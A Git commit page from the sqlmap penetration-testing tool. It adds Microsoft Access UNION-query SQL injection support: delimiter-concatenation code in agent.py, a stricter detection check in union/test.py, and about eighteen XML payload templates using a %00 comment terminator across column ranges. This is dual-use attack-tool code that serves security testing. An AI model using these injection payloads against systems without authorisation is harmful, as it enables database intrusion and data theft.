sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-18 04:20:35 +03:00
Code Issues Packages Projects Releases Wiki Activity

Revert of last commit and proper fix to detect UNION query SQL injection against Microsoft Access

Browse Source
This commit is contained in:
Bernardo Damele 2011-07-07 13:20:40 +00:00
parent c6a0b84242
commit 067354b97f
4 changed files with 417 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
lib/core/agent.py
View File

@ -500,6 +500,22 @@ class Agent:
elif fieldsNoSelect: elif fieldsNoSelect:
concatenatedQuery = "'%s'+%s+'%s'" % (kb.misc.start, concatenatedQuery, kb.misc.stop) concatenatedQuery = "'%s'+%s+'%s'" % (kb.misc.start, concatenatedQuery, kb.misc.stop)
elif Backend.isDbms(DBMS.ACCESS):
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&" % kb.misc.start, 1)
concatenatedQuery += "&'%s'" % kb.misc.stop
elif fieldsSelectCase:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&(SELECT " % kb.misc.start, 1)
concatenatedQuery += ")&'%s'" % kb.misc.stop
elif fieldsSelectFrom:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&" % kb.misc.start, 1)
concatenatedQuery = concatenatedQuery.replace(" FROM ", "&'%s' FROM " % kb.misc.stop, 1)
elif fieldsSelect:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'&" % kb.misc.start, 1)
concatenatedQuery += "&'%s'" % kb.misc.stop
elif fieldsNoSelect:
concatenatedQuery = "'%s'&%s&'%s'" % (kb.misc.start, concatenatedQuery, kb.misc.stop)
else: else:
concatenatedQuery = query concatenatedQuery = query

2
lib/core/settings.py
View File

@ -183,7 +183,7 @@ USER_AGENT_ALIASES = ( "ua", "useragent", "user-agent" )
FROM_TABLE = { FROM_TABLE = {
DBMS.ORACLE: " FROM DUAL", DBMS.ORACLE: " FROM DUAL",
DBMS.ACCESS: " FROM MSysAccessObjects%00", DBMS.ACCESS: " FROM MSysAccessObjects",
DBMS.FIREBIRD: " FROM RDB$DATABASE", DBMS.FIREBIRD: " FROM RDB$DATABASE",
DBMS.MAXDB: " FROM VERSIONS", DBMS.MAXDB: " FROM VERSIONS",
DBMS.DB2: " FROM SYSIBM.SYSDUMMY1" DBMS.DB2: " FROM SYSIBM.SYSDUMMY1"

6
lib/techniques/union/test.py
View File

@ -121,6 +121,7 @@ def __unionPosition(comment, place, parameter, value, prefix, suffix, count, whe
for position in positions: for position in positions:
# Prepare expression with delimiters # Prepare expression with delimiters
randQuery = randomStr(UNION_MIN_RESPONSE_CHARS) randQuery = randomStr(UNION_MIN_RESPONSE_CHARS)
phrase = "%s%s%s".lower() % (kb.misc.start, randQuery, kb.misc.stop)
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
randQueryUnescaped = unescaper.unescape(randQueryProcessed) randQueryUnescaped = unescaper.unescape(randQueryProcessed)
@ -134,13 +135,14 @@ def __unionPosition(comment, place, parameter, value, prefix, suffix, count, whe
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "") payload, True) or "")
if content and randQuery in content: if content and phrase in content:
validPayload = payload validPayload = payload
vector = (position, count, comment, prefix, suffix, kb.uChar, where) vector = (position, count, comment, prefix, suffix, kb.uChar, where)
if where == PAYLOAD.WHERE.ORIGINAL: if where == PAYLOAD.WHERE.ORIGINAL:
# Prepare expression with delimiters # Prepare expression with delimiters
randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS) randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS)
phrase2 = "%s%s%s".lower() % (kb.misc.start, randQuery2, kb.misc.stop)
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2) randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)
@ -152,7 +154,7 @@ def __unionPosition(comment, place, parameter, value, prefix, suffix, count, whe
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "") content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")
if content and ((randQuery in content and randQuery2 not in content) or (randQuery not in content and randQuery2 in content)): if content and ((randQuery in content and phrase2 not in content) or (randQuery not in content and phrase2 in content)):
vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE) vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE)
unionErrorCase = kb.errorIsNone and wasLastRequestDBMSError() unionErrorCase = kb.errorIsNone and wasLastRequestDBMSError()

396
xml/payloads.xml
View File

@ -2893,6 +2893,402 @@ Formats:
</details> </details>
</test> </test>
<test>
<title>Microsoft Access UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>3</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>%00</comment>
<char>[CHAR]</char>
<columns>[COLSTART]-[COLSTOP]</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test>
<title>Microsoft Access UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>3</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>%00</comment>
<char>NULL</char>
<columns>[COLSTART]-[COLSTOP]</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test>
<title>Microsoft Access UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>3</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>%00</comment>
<char>[RANDNUM]</char>
<columns>[COLSTART]-[COLSTOP]</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test>
<title>Microsoft Access UNION query ([CHAR]) - 1 to 10 columns</title>
<stype>3</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>%00</comment>
<char>[CHAR]</char>
<columns>1-10</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test>
<title>Microsoft Access UNION query (NULL) - 1 to 10 columns</title>
<stype>3</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>%00</comment>
<char>NULL</char>
<columns>1-10</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test>
<title>Microsoft Access UNION query ([RANDNUM]) - 1 to 10 columns</title>
<stype>3</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>%00</comment>
<char>[RANDNUM]</char>
<columns>1-10</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test>
<title>Microsoft Access UNION query ([CHAR]) - 11 to 20 columns</title>
<stype>3</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>%00</comment>
<char>[CHAR]</char>
<columns>11-20</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test>
<title>Microsoft Access UNION query (NULL) - 11 to 20 columns</title>
<stype>3</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>%00</comment>
<char>NULL</char>
<columns>11-20</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test>
<title>Microsoft Access UNION query ([RANDNUM]) - 11 to 20 columns</title>
<stype>3</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>%00</comment>
<char>[RANDNUM]</char>
<columns>11-20</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test>
<title>Microsoft Access UNION query ([CHAR]) - 21 to 30 columns</title>
<stype>3</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>%00</comment>
<char>[CHAR]</char>
<columns>21-30</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test>
<title>Microsoft Access UNION query (NULL) - 21 to 30 columns</title>
<stype>3</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>%00</comment>
<char>NULL</char>
<columns>21-30</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test>
<title>Microsoft Access UNION query ([RANDNUM]) - 21 to 30 columns</title>
<stype>3</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>%00</comment>
<char>[RANDNUM]</char>
<columns>21-30</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test>
<title>Microsoft Access UNION query ([CHAR]) - 31 to 40 columns</title>
<stype>3</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>%00</comment>
<char>[CHAR]</char>
<columns>31-40</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test>
<title>Microsoft Access UNION query (NULL) - 31 to 40 columns</title>
<stype>3</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>%00</comment>
<char>NULL</char>
<columns>31-40</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test>
<title>Microsoft Access UNION query ([RANDNUM]) - 31 to 40 columns</title>
<stype>3</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>%00</comment>
<char>[RANDNUM]</char>
<columns>31-40</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test>
<title>Microsoft Access UNION query ([CHAR]) - 41 to 50 columns</title>
<stype>3</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>%00</comment>
<char>[CHAR]</char>
<columns>41-50</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test>
<title>Microsoft Access UNION query (NULL) - 41 to 50 columns</title>
<stype>3</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>%00</comment>
<char>NULL</char>
<columns>41-50</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test>
<title>Microsoft Access UNION query ([RANDNUM]) - 41 to 50 columns</title>
<stype>3</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>%00</comment>
<char>[RANDNUM]</char>
<columns>41-50</columns>
</request>
<response>
<union/>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test> <test>
<title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title> <title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>3</stype> <stype>3</stype>